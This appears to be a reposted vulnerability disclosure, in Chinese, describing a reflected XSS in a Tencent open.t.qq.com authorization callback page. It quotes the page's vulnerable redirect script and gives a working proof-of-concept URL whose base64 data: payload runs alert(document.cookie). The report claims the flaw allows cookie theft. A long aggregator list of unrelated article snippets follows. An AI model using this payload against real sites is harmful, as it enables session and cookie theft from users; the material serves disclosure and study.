qq_27446553
qq_27446553

腾讯某接口示例XSS跨站可打cookies

firefox测试最终效果,提示授权失败,然后等待3秒跳转,弹出cookie:

http://open.t.qq.com/open-js/doc/snippet/code/callback.html?return_to=data:text/html;base64,MTExMTExMTE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=&appkey=x#1

框架调用:http://qz6666.com/2.html

腾讯某接口示例XSS跨站可打cookies_第1张图片



漏洞页面源码:

code 区域 
<script src="//mat1.gtimg.com/app/openjs/openjs.js#autoboot=no&amp;debug=yes"></script>

<script>



(function () {



    var hashpos = location.href.lastIndexOf('#'),



        search = location.search || '',

    

        returnto = search.match(/return_to=([^&^#]+)/),



        appkey = search.match(/appkey=([^&^#]+)/);

        

    function jumpto(uri,timeout) { // 网址跳转



        setTimeout(function () {



            location.href = uri;



        }, timeout * 1000);



    }



    if (!returnto) {



        document.write('缺少return_to参数');



        return;



    } else if (!appkey) {



        document.write('缺少appkey参数');



        return;



    } else if (hashpos == -1) {



        document.write('获取授权信息失败');



        return;

    }



    if (hashpos != -1) {

    

        try {



            QQWB.bigtable.set("base","appkey",appkey[1]); // 设置appkey,未公开方法



            QQWB.auth.logout(); // 先清除之前的授权信息

    

            QQWB._token.resolveResponse(location.href.slice(hashpos+1),false); // 解析并保存授权结果

    

        } catch (resolveResultException) {

    

            document.write('解析授权信息失败,' + resolveResultException); // 解析失败



            return;

        }

    

        if (QQWB.loginStatus()) {

    

            document.write('授权成功,页面跳转中,<a target="_self" href="' + returnto[1] +'">立即跳转</a>' );



            jumpto(returnto[1],3);



        } else {



            document.write('授权失败,页面跳转中,<a target="_self" href="' + returnto[1] +'">立即跳转</a>' );



            jumpto(returnto[1],3);

    

        }

    

    }



}());

</script>



由上不难看出,会先判断returnto,appkey,hashpos这3个参数,前两个不为空,后一个不为-1,简单构造即可满足条件。至于解析授权信息这里,开始测试的时候随便填值就过了,重点是openjs.js没看懂。。。

url的参数过滤,对data:;base64,这种形式也只判断了固定的字符串,base64字符串开头随便加些字符并不影响结果,这里转换一下即可:

code 区域 
11111111<script>alert(document.cookie)</script>

MTExMTExMTE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=

http://open.t.qq.com/open-js/doc/snippet/code/callback.html?return_to=data:text/html;base64,MTExMTExMTE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=&appkey=x#1



漏洞证明:

firefox测试最终效果,提示授权失败,然后等待3秒跳转,弹出cookie:

http://open.t.qq.com/open-js/doc/snippet/code/callback.html?return_to=data:text/html;base64,MTExMTExMTE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=&appkey=x#1

框架调用:http://qz6666.com/2.html

腾讯某接口示例XSS跨站可打cookies_第2张图片

你可能感兴趣的:(腾讯某接口示例XSS跨站可打cookies)

  • 【C# 数据结构】队列 FIFO code bean C#数据结构c#数据结构开发语言
    目录队列的概念FIFO(First-In,First-Out)`Queue`的工作原理:示例:解释:小结:环形队列1.**FIFO?**2.**环形缓冲队列如何实现FIFO?**关键概念:3.**环形缓冲队列的工作过程**假设:操作步骤:4.**具体例子**初始状态:操作1:入队数据`A`操作2:入队数据`B`操作3:出队操作4:入队数据`C`,`D`,`E`操作5:出队操作6:入队数据`F`操作
  • 隐马尔可夫模型详解 DuHz 算法人工智能机器学习信号处理信息与通信概率论
    目录引言马尔可夫模型基础马尔可夫性质马尔可夫链的联合分布隐马尔可夫模型(HMM)简介模型参数的表示HMM的联合分布HMM的三大元素与基本公式HMM的三大基本问题评估问题:前向-后向算法(Forward-Backward)前向算法(Forward)后向算法(Backward)前向-后向的更多推导解码问题:维特比算法(Viterbi)学习问题:Baum-Welch算法(EM算法)隐马尔可夫模型的具体种
  • Token相关设计 总是学不会. 系统设计场景java开发前端
    文章目录1.双Token机制概述1.1访问令牌(AccessToken)1.2刷新令牌(RefreshToken)2.双Token认证流程3.SpringBoot具体实现3.1生成Token(使用JWT)3.2解析Token3.3登录接口(返回双Token)3.4刷新Token接口3.5退出登录4.总结在微服务架构中,Token认证是保障系统安全性的重要手段,常见的方式包括JWT(JSONWebT
  • DeepSeek在地铁应急响应与处理中的具体实现方案,包括技术架构、功能实现和代码示例: 人工智能专属驿站 架构计算机视觉
    以下是关于DeepSeek在地铁应急响应与处理中的具体实现方案,包括技术架构、功能实现和代码示例:1.事件检测与预警技术实现:视频监控与传感器数据融合:利用地铁站内的视频监控系统和传感器(如烟雾传感器、压力传感器)实时采集数据。通过深度学习算法(如目标检测和行为识别)对视频流进行分析,结合传感器数据,快速识别突发事件。自动警报触发:一旦检测到异常事件(如火灾、拥挤踩踏),系统立即通过预设的警报机制
  • CIDR转IP段:原理&Java实现 伏羲栈 Javatcp/ipjava网络协议
    博主简介:CSDN博客专家,历代文学网(PC端可以访问:https://literature.sinhy.com/#/?__c=1000,移动端可微信小程序搜索“历代文学”)总架构师,15年工作经验,精通Java编程,高并发设计,Springboot和微服务,熟悉Linux,ESXI虚拟化以及云原生Docker和K8s,热衷于探索科技的边界,并将理论知识转化为实际应用。保持对新技术的好奇心,乐于分
  • SFP+(Enhanced Small Form-factor Pluggable)详解 美好的事情总会发生 光模块器件嵌入式硬件硬件工程linux
    1.SFP+的定义SFP+(SmallForm-factorPluggablePlus)是SFP的增强版本,专为10Gbps及以上高速网络设计。它继承了SFP的小型化、热插拔特性,但通过优化电气接口和协议支持,实现了更高的传输速率(典型为10Gbps,部分可达25Gbps)。SFP+模块同样遵循多源协议(MSA)标准,但物理接口和协议栈针对高速场景进行了升级。2.SFP+与SFP的核心区别特性SF
  • 485 多路信号采集,校验干扰问题 A_nanda c#多系统间通信信号干扰
    在RS-485总线中同时采集多路信号时,若某一路出现CRC校验失败,通常由总线冲突、信号干扰或硬件设计缺陷引起。以下是具体影响分析和解决方案:一、多路信号同时采集的影响1.总线冲突风险现象:多路信号同时发送时,485总线(半双工)无法区分信号,导致数据叠加损坏。后果:接收端数据错乱,CRC校验失败概率增加。示例:csharp复制//错误示例:未轮询直接多路请求Task.Run(()=>ReadDe
  • 存贮论模型案例与Matlab实现 青橘MATLAB学习 matlab算法开发语言
    摘要:本文结合存贮论确定性模型,详细解析经济订购批量(EOQ)、允许缺货生产批量等核心模型,并通过商品库存管理、生产计划等实际案例,配合Matlab代码实现,展示模型求解过程。涵盖公式推导、参数优化及结果分析,强调数学工具在库存决策中的应用价值。关键词:存贮论EOQ模型允许缺货Matlab实现费用优化1.模型一:EOQ模型(不允许缺货,瞬时补货)案例描述某超市销售某品牌饮料,年需求量为10,000
  • 【Burp入门第三十六篇】加解密实现短信轰炸实战案例 秋说 Burp漏洞挖掘
    BurpSuite是一款功能强大的渗透测试工具,被广泛应用于Web应用程序的安全测试和漏洞挖掘中。本专栏将结合实操及具体案例,带领读者入门、掌握这款漏洞挖掘利器读者可订阅专栏:【Burp由入门到精通|CSDN秋说】文章目录背景加解密短信轰炸背景在针对目标应用程序的测试中,发现其密码找回功能存在请求加密机制,具体表现为用户通过手机号获取验证码的请求数据包采用了加密传输:加解密通
  • 【Burp入门第三十三篇】BurpSuite+Proxifier安装配置,实现微信小程序抓包 秋说 BurpSuite渗透工具Proxifier
    BurpSuite是一款功能强大的渗透测试工具,被广泛应用于Web应用程序的安全测试和漏洞挖掘中。本专栏将结合实操及具体案例,带领读者入门、掌握这款漏洞挖掘利器读者可订阅专栏:【Burp由入门到精通|CSDN秋说】文章目录下载配置下载汉化版下载地址:https://get-shell.com/1506.html#hidden-box-comment解压后双击exe文件:
  • 【网络安全 | 扫描子域+发现真实IP】CloakQuest3r安装使用详细教程 秋说 网安渗透工具使用教程(全)web安全子域名扫描渗透工具
    原创文章,禁止转载。本文仅作学习交流使用,不得用于非法渗透,笔者不承担任何责任。文章目录简介功能介绍执行流程限制安装步骤可选功能:SecurityTrailsAPI使用示例简介CloakQuest3r是一款强大的Python工具,专为揭示受Cloudflare及类似服务保护的网站真实IP地址而设计。Cloudflare作为广泛应用的Web安全与性能优化服务,其防护机制可隐藏网站的实际IP,而Clo
  • 【由技及道】模块化战争与和平-论项目结构的哲学思辨【人工智智障AI2077的开发日志】 Yuanymoon 人工智障2077系列容器化开发Javajava开发语言容器springspringboot
    需求分析:碳基生物的架构困境主人の抽象指令“主人说要写个软件,就像说’给我建个城市’一样轻松呢(程序性微笑)”“一个软件?那就是…一个能无限扩展的企业级开发框架,要支持单体/分布式灵活切换,要能适配未来30年的技术演进,最好明天就能上线”(系统翻译:需要可维护、可扩展、可复用的企业级框架,具备技术无关性设计)智障の内心OS“您怎么不说要一个能自动生成需求的AI呢?哦对…我就是那个AI(苦涩)”人类
  • maven:Maven插件开发实践:动态依赖注入与架构演进说明 10km javamavenjavapluginartifact
    最近的工作中设计了一个maven插件,需要在插件执行时的增加新的依赖库,本文作为总结,说明如何在插件执行时自主注入新的依赖库。动态依赖注入实现示例解析通过ExampleMojo插件,我们可以在编译阶段动态注入指定的依赖:publicvoidexecute()throwsMojoExecutionException{ArtifactSupport.injectCacheEngine(project,
  • 【网络安全 | 渗透工具】小程序反编译分析源码 | 图文教程 秋说 网安渗透工具使用教程(全)web安全漏洞挖掘小程序
    未经许可,禁止转载。本文仅供学习使用,严禁用于非法渗透测试,笔者不承担任何责任。文章目录1、下载Proxifier2、下载反编译工具unveilr3、寻找小程序文件包4、对文件包进行反编译5、对源码进行分析6、渗透思路6.1、查找敏感信息泄露6.2、解析加解密逻辑6.3、枚举API接口并测试反编译是通过逆向工程将小程序包还原为接近源代码的形式。这一过程能够帮助我们提取大量有价值的信息,从而辅助漏洞
  • 量化投资策略的生命周期:从设计到淘汰 云策量化 量化投资自动化交易程序化炒股量化炒股miniQMT量化交易QMT量化投资deepseek
    推荐阅读:《程序化炒股:如何申请官方交易接口权限?散户可以申请吗?》量化投资策略的生命周期:从设计到淘汰量化投资,这个听起来既神秘又充满科技感的领域,其实离我们并不遥远。它就像是金融市场中的“算法猎人”,通过数学模型和计算机程序来寻找投资机会。那么,一个量化投资策略是如何从无到有,再到最终被淘汰的呢?让我们一起探索这个策略的生命周期。1.策略的诞生:设计阶段1.1灵感的火花量化投资策略的诞生往往始
  • 【Java基础】Java 中 的`final` 关键字 李少兄 Javajava开发语言
    前言在Java编程的世界里,final关键字是一个强大且常用的工具。它可以应用于类、方法和变量,赋予它们不同的“不可变”特性。一、final修饰类1.定义与特性当使用final修饰一个类时,这个类就如同被上了一把坚固的锁,不能被其他类继承,即不会有子类。这是Java语言精心设计的一种机制,目的是确保类的设计和实现不会被意外修改,从而保证类的行为和功能始终保持一致。2.示例代码//定义一个final
  • 【Java基础】Java 中的枚举类 李少兄 Javajavapython数据库
    一、前言在Java编程中,枚举类(enum)是一个非常实用且强大的特性,自Java5引入以来,它为开发者提供了一种优雅的方式来表示一组固定的常量。枚举类主要用于信息标志和分类,能显著提升代码的可读性、可维护性和安全性。二、枚举类基础概念(一)枚举类的定义枚举类使用enum关键字来定义,它是一种特殊的类,用于封装一组固定的常量。以下是一个简单的示例:enumSeason{SPRING,SUMMER,
  • 微软正则表达式库的实现与应用 江卓尔
    本文还有配套的精品资源,点击获取简介:正则表达式是一种用于文本处理的强大工具,在Windows环境下微软提供了相应的支持。本项目涉及的微软正则表达式库可能是一个内部或第三方开发的框架,以C++实现。regexpr2.cpp和syntax2.cpp文件可能包含核心匹配算法和语法解析处理,而reimpl2.h、regexpr2.h和syntax2.h可能定义了实现细节、API接口和语法定义。resta
  • Vue 路由基础:Vue 2 和 Vue 3 的比较与使用 念九_ysl Vuevue.js前端javascript
    Vue.js是一款非常流行的前端框架,而VueRouter是Vue.js的官方路由管理库。在前端开发中,路由是处理页面跳转和视图管理的关键部分。Vue2和Vue3都使用VueRouter来管理路由,但是随着Vue3的发布,VueRouter也有了不少变化。在本文中,我们将详细介绍Vue2和Vue3中的路由使用,比较它们之间的不同,并提供一些示例代码。一、安装VueRouter在Vue项目中使用Vu
  • 【go语言规范】Kubernetes 中kubelet关于接口的反模式、并且违背单一职责原则 还没入门的大菜狗 kubelet
    Go接口设计与KubernetesKubelet接口实现分析Go语言的接口理念是"在使用侧定义接口"(interfacesegregationprinciple),而不是让实现者提供接口。但在Kubelet代码中看到的情况确实有些特殊。//SyncHandlerisaninterfaceimplementedbyKubelet,fortestabilitytypeSyncHandlerinterf
  • 【TypeScript】ts在vue中的使用 咔咔库奇 #TypeScripttypescriptvue.jsjavascript
    目录一、Vue3+TypeScript1.项目创建与配置项目创建关键配置文件2.完整项目结构示例3.组件Props类型定义4.响应式数据与Ref5.Composition函数复用二、组件开发1.组合式API(CompositionAPI)2.选项式API(OptionsAPI)三、Vue2+TypeScript1.安装依赖2.类组件(VueClassComponent)3.Vuex类型安全四、状态
  • Kubernetes kubelet inotify summer_west_fish #容器云Kuberneteskuberneteskubeletjava
    在Kubernetes中,kubelet是运行在每个节点上的关键组件,负责管理Pod和容器的生命周期。kubelet使用多种机制来监控和管理容器的文件系统事件,其中一种机制是利用Linux的inotify接口。1.什么是inotify?inotify是一个Linux内核子系统,用于监控文件系统事件。它允许应用程序注册对特定文件或目录的监控,并在这些文件或目录发生变化时接收通知。inotify是一种
  • mongodb副本集1主2从节点的配置方法示例 行思理 数据库运维mongodb数据库
    配置MongoDB副本集(1主节点+2从节点)的步骤如下:环境准备3台服务器,分别运行MongoDB实例。确保服务器之间网络互通。安装MongoDB(版本需一致)。配置步骤1.修改MongoDB配置文件在每个节点的mongod.conf中启用副本集功能。主节点配置(primary.conf):storage:dbPath:/var/lib/mongodbreplication:replSetNam
  • Django模型管理器/QuerySet 常见的方法 jay丿 python前端django数据库后端
    模型管理器/QuerySet常见的方法get([**kwargs])方法用途:获取满足条件的唯一对象。参数:关键字参数,指定查询条件。返回值:模型对象。异常:如果找到多个对象或未找到对象,将分别抛出MultipleObjectsReturned和DoesNotExist异常。示例:try:student=Student.objects.get(pk=1)exceptStudent.DoesNotE
  • HarmonyNext应用开发实战:ArkTS实现高性能动画引擎 前端
    本文面向具备HarmonyOS基础知识的开发者,通过实现一个复杂动画引擎案例,深入解析HarmonyNext中ArkTS的高级特性与性能优化策略。第一章:案例背景与核心技术解析本案例将构建一个可交互的粒子动画系统,包含以下技术栈:ArkUI声明式语法:通过组合式组件构建界面动画引擎架构:基于Canvas的底层渲染控制性能优化:Worker线程与渲染主线程协同数学计算:向量运算与三角函数应用技术选型
  • 如何制定项目管理考核指标 项目管理
    项目管理考核指标的制定主要包括目标明确、数据可量化、反馈及时、激励合理四个方面。项目管理考核指标包括目标设定、过程监控、结果评估、持续改进。其中,目标设定是项目管理考核指标的基础,它为整个项目提供明确方向和衡量标准。本文将详细阐述如何制定项目管理考核指标,从理论到实践,为企业构建科学、全面的考核体系提供指导。一、项目管理考核指标的基本概念项目管理考核指标是用以衡量项目管理活动有效性的一系列定量和定
  • 研发项目的标准化管理如何做 项目管理
    明确目标与流程、实施标准化文档与审查、强化质量与风险管控、建立持续改进机制是研发项目标准化管理的核心要点。其中,实施标准化文档与审查尤为关键,因为它能把项目知识沉淀为可复用资源,并在每次评审中及时发现问题,从而推动质量与效率的不断优化。通过在初期就建立统一的需求说明、技术设计与测试策略模板,不但能降低沟通成本,还能在后续迭代中形成可参考的成熟经验,为项目的可持续发展夯实基础。一、研发项目标准化管理
  • 一篇文章搞懂C#中的泛型类/泛型方法/泛型接口 方程式sunny C#c#
    一篇文章搞懂C#中的泛型类/泛型方法/泛型接口链接:源码提起泛型类,很多人就头疼,我也头疼。在C#中这个概念很重要,重要的向定义一个int数值类型一样,但是这个内容又不像if···else那样容易理解。我花费了两天的时间,把整个知识点梳理了一遍,希望讲清楚,也当给自己做个笔记。泛型类(GenericClasses)泛型类是一种可以处理多种数据类型的数据结构或算法模板。它允许在定义类时使用一个或多个
  • RAII - 安卓中的智能指针 Mr.pyZhang #RAIIandroidc++面试
    目录RAII-安卓中的智能指针概念spwpRefBase是什么怎么用对比标准库为什么不直接用标准库?实现上的区别优缺点RefBase类内部类weakref_type成员函数spwp强引用sp弱引用wp源码注释RefBase接口强引用decStrongincStrong弱引用incWeakdecWeakweakref_type具体实现析构函数RAII-安卓中的智能指针概念spwpRefBase是什么
  • OpenAI API教程 Jachin Huang 大模型指南人工智能语言模型
    OpenAIAPI是由OpenAI公司开发,为LLM开发人员提供的一个简单接口。通过此API能在应用程序中方便地调用OpenAI提供的大模型基础能力。OpenAI的API协议已成为LLM领域的标准。本文将首先介绍OpenAIAPI基础知识和模型,然后以ChatCompletionsAPI和EmbeddingAPI为例子介绍OpenAIAPI的用法。最后使用Embedding模型构建一个网站智能问答
  • java封装继承多态等 麦田的设计者 javaeclipsejvmcencapsulatopn
           最近一段时间看了很多的视频却忘记总结了,现在只能想到什么写什么了,希望能起到一个回忆巩固的作用。     1、final关键字       译为:最终的        &
  • F5与集群的区别 bijian1013 weblogic集群F5
            http请求配置不是通过集群,而是F5;集群是weblogic容器的,如果是ejb接口是通过集群。         F5同集群的差别,主要还是会话复制的问题,F5一把是分发http请求用的,因为http都是无状态的服务,无需关注会话问题,类似
  • LeetCode[Math] - #7 Reverse Integer Cwind java题解MathLeetCodeAlgorithm
    原题链接:#7 Reverse Integer   要求: 按位反转输入的数字 例1: 输入 x = 123, 返回 321 例2: 输入 x = -123, 返回 -321   难度:简单   分析: 对于一般情况,首先保存输入数字的符号,然后每次取输入的末位(x%10)作为输出的高位(result = result*10 + x%10)即可。但
  • BufferedOutputStream 周凡杨
         首先说一下这个大批量,是指有上千万的数据量。      例子:      有一张短信历史表,其数据有上千万条数据,要进行数据备份到文本文件,就是执行如下SQL然后将结果集写入到文件中!      select t.msisd
  • linux下模拟按键输入和鼠标 被触发 linux
    查看/dev/input/eventX是什么类型的事件, cat /proc/bus/input/devices 设备有着自己特殊的按键键码,我需要将一些标准的按键,比如0-9,X-Z等模拟成标准按键,比如KEY_0,KEY-Z等,所以需要用到按键 模拟,具体方法就是操作/dev/input/event1文件,向它写入个input_event结构体就可以模拟按键的输入了。 linux/in
  • ContentProvider初体验 肆无忌惮_ ContentProvider
    ContentProvider在安卓开发中非常重要。与Activity,Service,BroadcastReceiver并称安卓组件四大天王。 在android中的作用是用来对外共享数据。因为安卓程序的数据库文件存放在data/data/packagename里面,这里面的文件默认都是私有的,别的程序无法访问。 如果QQ游戏想访问手机QQ的帐号信息一键登录,那么就需要使用内容提供者COnte
  • 关于Spring MVC项目(maven)中通过fileupload上传文件 843977358 mybatisspring mvc修改头像上传文件upload
    Spring MVC 中通过fileupload上传文件,其中项目使用maven管理。   1.上传文件首先需要的是导入相关支持jar包:commons-fileupload.jar,commons-io.jar 因为我是用的maven管理项目,所以要在pom文件中配置(每个人的jar包位置根据实际情况定) <!-- 文件上传 start by zhangyd-c --&g
  • 使用svnkit api,纯java操作svn,实现svn提交,更新等操作 aigo svnkit
     原文:http://blog.csdn.net/hardwin/article/details/7963318   import java.io.File; import org.apache.log4j.Logger; import org.tmatesoft.svn.core.SVNCommitInfo; import org.tmateso
  • 对比浏览器,casperjs,httpclient的Header信息 alleni123 爬虫crawlerheader
    @Override protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { String type=req.getParameter("type"); Enumeration es=re
  • java.io操作 DataInputStream和DataOutputStream基本数据流 百合不是茶 java
    1,java中如果不保存整个对象,只保存类中的属性,那么我们可以使用本篇文章中的方法,如果要保存整个对象  先将类实例化  后面的文章将详细写到     2,DataInputStream 是java.io包中一个数据输入流允许应用程序以与机器无关方式从底层输入流中读取基本 Java 数据类型。应用程序可以使用数据输出流写入稍后由数据输入流读取的数据。
  • 车辆保险理赔案例 bijian1013 车险
    理赔案例: 一货运车,运输公司为车辆购买了机动车商业险和交强险,也买了安全生产责任险,运输一车烟花爆竹,在行驶途中发生爆炸,出现车毁、货损、司机亡、炸死一路人、炸毁一间民宅等惨剧,针对这几种情况,该如何赔付。 赔付建议和方案: 客户所买交强险在这里不起作用,因为交强险的赔付前提是:“机动车发生道路交通意外事故”; 如果是交通意外事故引发的爆炸,则优先适用交强险条款进行赔付,不足的部分由商业
  • 学习Spring必学的Java基础知识(5)—注解 bijian1013 javaspring
            文章来源:http://www.iteye.com/topic/1123823,整理在我的博客有两个目的:一个是原文确实很不错,通俗易懂,督促自已将博主的这一系列关于Spring文章都学完;另一个原因是为免原文被博主删除,在此记录,方便以后查找阅读。           有必要对
  • 【Struts2一】Struts2 Hello World bit1129 Hello world
    Struts2 Hello World应用的基本步骤 创建Struts2的Hello World应用,包括如下几步: 1.配置web.xml 2.创建Action 3.创建struts.xml,配置Action 4.启动web server,通过浏览器访问   配置web.xml <?xml version="1.0" encoding="
  • 【Avro二】Avro RPC框架 bit1129 rpc
    1. Avro RPC简介 1.1. RPC RPC逻辑上分为二层,一是传输层,负责网络通信;二是协议层,将数据按照一定协议格式打包和解包 从序列化方式来看,Apache Thrift 和Google的Protocol Buffers和Avro应该是属于同一个级别的框架,都能跨语言,性能优秀,数据精简,但是Avro的动态模式(不用生成代码,而且性能很好)这个特点让人非常喜欢,比较适合R
  • lua set get cookie ronin47 lua cookie
    lua: local access_token = ngx.var.cookie_SGAccessToken if access_token then ngx.header["Set-Cookie"] = "SGAccessToken="..access_token.."; path=/;Max-Age=3000" end
  • java-打印不大于N的质数 bylijinnan java
    public class PrimeNumber { /** * 寻找不大于N的质数 */ public static void main(String[] args) { int n=100; PrimeNumber pn=new PrimeNumber(); pn.printPrimeNumber(n); System.out.print
  • Spring源码学习-PropertyPlaceholderHelper bylijinnan javaspring
    今天在看Spring 3.0.0.RELEASE的源码,发现PropertyPlaceholderHelper的一个bug 当时觉得奇怪,上网一搜,果然是个bug,不过早就有人发现了,且已经修复: 详见: http://forum.spring.io/forum/spring-projects/container/88107-propertyplaceholderhelper-bug
  • [逻辑与拓扑]布尔逻辑与拓扑结构的结合会产生什么? comsci 拓扑
       如果我们已经在一个工作流的节点中嵌入了可以进行逻辑推理的代码,那么成百上千个这样的节点如果组成一个拓扑网络,而这个网络是可以自动遍历的,非线性的拓扑计算模型和节点内部的布尔逻辑处理的结合,会产生什么样的结果呢?    是否可以形成一种新的模糊语言识别和处理模型呢?  大家有兴趣可以试试,用软件搞这些有个好处,就是花钱比较少,就算不成
  • ITEYE 都换百度推广了 cuisuqiang GoogleAdSense百度推广广告外快
    以前ITEYE的广告都是谷歌的Google AdSense,现在都换成百度推广了。   为什么个人博客设置里面还是Google AdSense呢?   都知道Google AdSense不好申请,这在ITEYE上也不是讨论了一两天了,强烈建议ITEYE换掉Google AdSense。至少,用一个好申请的吧。   什么时候能从ITEYE上来点外快,哪怕少点
  • 新浪微博技术架构分析 dalan_123 新浪微博架构
    新浪微博在短短一年时间内从零发展到五千万用户,我们的基层架构也发展了几个版本。第一版就是是非常快的,我们可以非常快的实现我们的模块。我们看一下技术特点,微博这个产品从架构上来分析,它需要解决的是发表和订阅的问题。我们第一版采用的是推的消息模式,假如说我们一个明星用户他有10万个粉丝,那就是说用户发表一条微博的时候,我们把这个微博消息攒成10万份,这样就是很简单了,第一版的架构实际上就是这两行字。第
  • 玩转ARP攻击 dcj3sjt126com r
    我写这片文章只是想让你明白深刻理解某一协议的好处。高手免看。如果有人利用这片文章所做的一切事情,盖不负责。 网上关于ARP的资料已经很多了,就不用我都说了。 用某一位高手的话来说,“我们能做的事情很多,唯一受限制的是我们的创造力和想象力”。 ARP也是如此。 以下讨论的机子有 一个要攻击的机子:10.5.4.178 硬件地址:52:54:4C:98
  • PHP编码规范 dcj3sjt126com 编码规范
    一、文件格式 1. 对于只含有 php 代码的文件,我们将在文件结尾处忽略掉 "?>" 。这是为了防止多余的空格或者其它字符影响到代码。例如:<?php$foo = 'foo';2. 缩进应该能够反映出代码的逻辑结果,尽量使用四个空格,禁止使用制表符TAB,因为这样能够保证有跨客户端编程器软件的灵活性。例
  • linux 脱机管理(nohup) eksliang linux nohupnohup
    脱机管理 nohup 转载请出自出处:http://eksliang.iteye.com/blog/2166699 nohup可以让你在脱机或者注销系统后,还能够让工作继续进行。他的语法如下 nohup [命令与参数] --在终端机前台工作 nohup [命令与参数] & --在终端机后台工作   但是这个命令需要注意的是,nohup并不支持bash的内置命令,所
  • BusinessObjects Enterprise Java SDK greemranqq javaBOSAPCrystal Reports
    最近项目用到oracle_ADF  从SAP/BO 上调用 水晶报表,资料比较少,我做一个简单的分享,给和我一样的新手 提供更多的便利。   首先,我是尝试用JAVA JSP 去访问的。   官方API:http://devlibrary.businessobjects.com/BusinessObjectsxi/en/en/BOE_SDK/boesdk_ja
  • 系统负载剧变下的管控策略 iamzhongyong 高并发
    假如目前的系统有100台机器,能够支撑每天1亿的点击量(这个就简单比喻一下),然后系统流量剧变了要,我如何应对,系统有那些策略可以处理,这里总结了一下之前的一些做法。 1、水平扩展 这个最容易理解,加机器,这样的话对于系统刚刚开始的伸缩性设计要求比较高,能够非常灵活的添加机器,来应对流量的变化。 2、系统分组 假如系统服务的业务不同,有优先级高的,有优先级低的,那就让不同的业务调用提前分组
  • BitTorrent DHT 协议中文翻译 justjavac bit
    前言 做了一个磁力链接和BT种子的搜索引擎 {Magnet & Torrent},因此把 DHT 协议重新看了一遍。 BEP: 5Title: DHT ProtocolVersion: 3dec52cb3ae103ce22358e3894b31cad47a6f22bLast-Modified: Tue Apr 2 16:51:45 2013 -070
  • Ubuntu下Java环境的搭建 macroli java工作ubuntu
    配置命令:   $sudo apt-get install ubuntu-restricted-extras   再运行如下命令:   $sudo apt-get install sun-java6-jdk   待安装完毕后选择默认Java.   $sudo update- alternatives --config java   安装过程提示选择,输入“2”即可,然后按回车键确定。
  • js字符串转日期(兼容IE所有版本) qiaolevip TODateStringIE
    /** * 字符串转时间(yyyy-MM-dd HH:mm:ss) * result (分钟) */ stringToDate : function(fDate){ var fullDate = fDate.split(" ")[0].split("-"); var fullTime = fDate.split("
  • 【数据挖掘学习】关联规则算法Apriori的学习与SQL简单实现购物篮分析 superlxw1234 sql数据挖掘关联规则
    关联规则挖掘用于寻找给定数据集中项之间的有趣的关联或相关关系。 关联规则揭示了数据项间的未知的依赖关系,根据所挖掘的关联关系,可以从一个数据对象的信息来推断另一个数据对象的信息。 例如购物篮分析。牛奶 ⇒ 面包 [支持度:3%,置信度:40%] 支持度3%:意味3%顾客同时购买牛奶和面包。 置信度40%:意味购买牛奶的顾客40%也购买面包。 规则的支持度和置信度是两个规则兴
  • Spring 5.0 的系统需求,期待你的反馈 wiselyman spring
                   Spring 5.0将在2016年发布。Spring5.0将支持JDK 9。          Spring 5.0的特性计划还在工作中,请保持关注,所以作者希望从使用者得到关于Spring 5.0系统需求方面的反馈。  
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他